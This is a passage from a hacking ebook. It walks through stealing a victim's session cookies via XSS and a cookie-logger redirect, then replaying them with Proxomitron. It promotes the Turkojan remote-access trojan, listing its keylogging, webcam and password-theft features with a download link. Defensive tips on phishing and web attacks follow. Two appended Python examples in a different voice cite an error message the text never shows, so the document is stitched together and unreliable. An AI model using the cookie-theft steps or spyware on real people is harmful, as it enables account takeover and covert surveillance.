Vulnerablesite is the site which is exploited by xss and http://www.xxxx.com/cookielogger.php is the url of the cookie logger file which you have created previously. Now the hacker will upload the redirect.php file to a webhosting site. Now when the victim clicks on the cookielogger.php link he will be redirected to the original site with the exploit added and his cookies will be saved in the cookielog.txt file. Once the hacker gets the victim's cookies he/she will use them to gain access to sensitive data; this process is also called session hijacking. The hacker can use cookie stealing tools such as Add N Edit Cookies (Firefox addon) or Proxomitron. Here I am using Proxomitron to demonstrate cookie stealing.

Open Proxomitron and just place a “V” before the outgoing header filter. We want to send the user's cookie to the webserver as if it were our own cookie. Press the header button and it will create a new header for filtering the cookie. Apply the new header now.

Now you just have to configure your browser to use a proxy server. When your browser is set up to use your own proxy server you just have to go to the target url and you will access his/her sensitive data.

Types of Malware
Malware exists in many types; some common types of Malware are as follows:

1. Trojan horse
2. Worms
3. Backdoors
4. Adware
5. Rootkits
6. Spywares
7. Wabbits
8. URL Injectors etc.

Turkojan
Turkojan is a Remote administration and spying tool for the windows operating system. The working is similar to Prorat but it has more functions than Prorat.

Below are some features of the latest version of Turkojan:
Reverse Connection
Remote Desktop (very fast)
Webcam Streaming (very fast)
Audio Streaming
Thumbnail viewer
Remote passwords
MSN Sniffer
Remote Shell
Web-Site Blocking
Chat with server
Send fake messages
Advanced file manager
Zipping files & folders
Find files
Change remote screen resolution
Mouse manager
Information about remote computer
Clipboard manager
IE options
Running Process
Service Manager
Keyboard Manager
Online keylogger
Offline keylogger
Fun Menu
Registry manager
Invisible in searching Files/Regedit/Msconfig
Small Server (100kb)

Download Turkojan from the link below: www.turkojan.com

Password Hacking
Guessing the password – To avoid a password guessing attack do not keep your password such as your date of birth, your father's name etc.

Guessing the Secret answer – Don't keep your secret answer too simple. For example if your secret question is “What's your Mother's birth place?”, then if the hacker has some information about you he can easily guess it. I recommend you keep your secret answer as complicated as possible.

Social Engineering – Social Engineering attacks are really difficult to avoid, but there are several methods to avoid them.
1. Never give your password or your personal information to any company representative unless and until you are sure about his/her identity.
2. Employees from companies like Google, youtube, Hotmail etc will never ask for your password.
3. Never assume that a phone call which appears to come from an organization is genuine.
4. If you are unsure that an Email is genuine, verify it by contacting the company.

Phishing – Almost 80% of email accounts are hacked by this method; the below steps will help you to successfully avoid being a victim of a Phishing attack.
1. If you are an Internet explorer user I recommend you to use a Phishing filter; it will alert you every time you come across a Fake login page or Phisher site. Click here to download phishing filter

2. If you are a firefox user I recommend you use the firefox addon Secure login. What Secure login does is automatically skip the fake pages, hence securing you from all kinds of Phishing Attacks.
3. Remember, if on a secure page, look for “https” at the beginning of the URL and the padlock icon in the browser.
4. Sites like paypal, Alertpay, Money Bookers will always address you by name instead of “Dear Paypal user”, “Dear Valued customer” or other names like that.

Here are a few phrases to look for if you think an e-mail message is a phishing scam:
1. Verify or update your account.
2. You have won a lottery.
3. If you don't respond or update your information your account will be closed in 24 hours.

Link Manipulation – To avoid being a victim of a Link manipulation attack always check the url of the page before logging in. For example if you are logging into a Facebook account first check the url; the phisher site may look like www.facebok.com or www.facebuk.com or something like that. Alternatively you can use Phishing filter or Secure login to protect yourself from a Link manipulation attack.

Desktop Phishing – To protect yourself from being a victim of Desktop Phishing I recommend you use a program called Macros. As you know, in desktop Phishing the hackers replace your Windows/System32/drivers/etc/hosts file. What Macros does is protect your hosts file, which prevents the desktop phishing attack.

Tabnabbing – The easiest way to avoid a tabnabbing attack is using firefox secure login and

Mail:mtahirzahid@yahoo.com

Page 161


Power Of Hacking Phishing filter. Keylogging – Keylogging is a easy to avoid if you have a good antivirus program installed. However some skilled hackers use some methods like Crypting, Hexing, Filepumping etc to make it hard for antivirus programs to detect it. So Antivirus alone wont protect you from keylogging you need a good antispyware program such as Spyware cease or Noadware. You can also use some antilogging programs such as zemana antilogger. For Firefox users I recommend you using Keyscrambler. Keyscrambler is a unique antilogging program which scrambles your keystrokes so the attacker will get the wrong keystrokes. Website Hacking SQL Injection SQL Injection occurs when your web form accept special characters. The best way to avoid SQL Injection attack is to disallow spaces and special characters. Cross Site Scripting A Cross Site scripting attack can be prevented by following the steps below: 1. Encode output based on input parameters. 2. Filter input parameters for special characters. 3. Filter output based on input parameters for special characters. Remote File Inclusion A Remote File Inclusion attack can be avoided by disabling register_globals and allow_url_open in your sever php.ini file. Local File Inclusion Local File Inclusion attacks can be avoided by good coding practices and also by disallowing any scripts to be uploaded on your server. DDOS Attacks Its truly very difficult to avoid a DDOS attacks web giants like Google , Yahoo and

Mail:mtahirzahid@yahoo.com

Page 162


Power Of Hacking Twitter have also been the victim of this attack. I suggest you to look for some services which could help you fight with this attack. Wireless Hacking ARP Poisoning Attack Arpon (Arp Handler Inspection) is a portable handler daemon which protects that makes ARP secure to avoid ARP Poisoning attacks. You also need to you a strong firewall such as zonealaram and commodo I personally recommend you using commodo firewall because it works best with ARP attacks by default ARP protection is disabled in commodo firewall you need to enable it, to enable it click on Firewall at the top bar and then Click Advanced button at the left pane. Go to Attack Detection Settings

and check “Protect the ARP Cache� Packet Sniffing To prevent packet sniffing attack make sure that the sites important to you use SSL Encryption. If SSL encryption is enabled the url will begin with https:// instead of http://. Mail:mtahirzahid@yahoo.com
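The Desktop Phishing paragraph above describes the attack as a rewrite of the hosts file so that a login domain resolves to the attacker's machine. The following is an added example, not the book's code or any named product, that scans hosts-file text for exactly that: a watched domain pinned to anything other than a loopback address. The watched domains and the sample hosts content are constructed for the demonstration.

```python
"""Flag 'desktop phishing' entries in hosts-file text (added example)."""
import ipaddress

# Assumption: the domains you log into; adjust to your own list.
WATCHED_DOMAINS = {"facebook.com", "paypal.com", "mail.yahoo.com"}


def parse_hosts(text):
    """Yield (ip, hostname) pairs from hosts-file text, ignoring comments."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # strip trailing comments
        if not line:
            continue
        parts = line.split()
        if len(parts) < 2:
            continue  # malformed line: no hostname
        for host in parts[1:]:
            yield parts[0], host.lower().rstrip(".")


def is_watched(host):
    """True if host is a watched domain or one of its subdomains."""
    return any(host == d or host.endswith("." + d) for d in WATCHED_DOMAINS)


def suspicious_entries(text):
    """Return [(ip, host)] for watched domains pinned to non-loopback IPs."""
    hits = []
    for ip, host in parse_hosts(text):
        if not is_watched(host):
            continue
        try:
            addr = ipaddress.ip_address(ip)
        except ValueError:
            hits.append((ip, host))  # unparsable address is itself suspicious
            continue
        if not addr.is_loopback:
            hits.append((ip, host))
    return hits


# Constructed sample: stock Windows lines plus two planted redirects.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-2009 Microsoft Corp.
127.0.0.1       localhost
::1             localhost
198.51.100.23   www.facebook.com facebook.com   # planted redirect
198.51.100.23   www.paypal.com
127.0.0.1       ads.example.net                  # harmless local block
"""
```

Loopback entries are deliberately ignored, since pinning ad or tracking domains to 127.0.0.1 is a common and legitimate use of the same file.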

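The SQL Injection entry in the Website Hacking section recommends rejecting spaces and special characters in form input. This added example, written for this page rather than taken from the book, puts that input-side rule next to the two ways a login query can be built: pasting the input into the SQL text, and passing it as a bound parameter. It uses Python's sqlite3 with a constructed users table and a legitimate username containing an apostrophe, the same character the book's OLE DB error message complains about.

```python
"""SQL injection: string-built query vs. parameterized query (added example)."""
import re
import sqlite3

SPECIAL = re.compile(r"[^A-Za-z0-9_]")  # the book's rule: no spaces/specials


def passes_filter(value):
    """Input-side check the text recommends: reject spaces/special chars."""
    return not SPECIAL.search(value)


def setup_db():
    """In-memory users table with constructed sample rows."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (name TEXT, pw TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?)",
                    [("alice", "s3cret"), ("o'brien", "pa55")])
    return con


def count_unsafe(con, name, pw):
    """Vulnerable pattern: user input pasted straight into the SQL text."""
    sql = f"SELECT COUNT(*) FROM users WHERE name = '{name}' AND pw = '{pw}'"
    return con.execute(sql).fetchone()[0]


def count_safe(con, name, pw):
    """Hardened pattern: placeholders keep input as data, never as SQL."""
    sql = "SELECT COUNT(*) FROM users WHERE name = ? AND pw = ?"
    return con.execute(sql, (name, pw)).fetchone()[0]


def demo():
    """Run both patterns on the apostrophe-bearing user; return observations."""
    con = setup_db()
    out = {"filter_accepts": passes_filter("o'brien"),
           "safe": count_safe(con, "o'brien", "pa55")}
    try:
        out["unsafe"] = count_unsafe(con, "o'brien", "pa55")
    except sqlite3.OperationalError as e:
        out["unsafe"] = f"error: {e}"  # the quote changed the statement itself
    return out
```

The filter rejects the legitimate user outright, the string-built query breaks on the quote (the same "unclosed quotation mark" class of error the book shows), and only the parameterized query answers correctly, so treat the character filter as a supplement to placeholders, not a replacement for them.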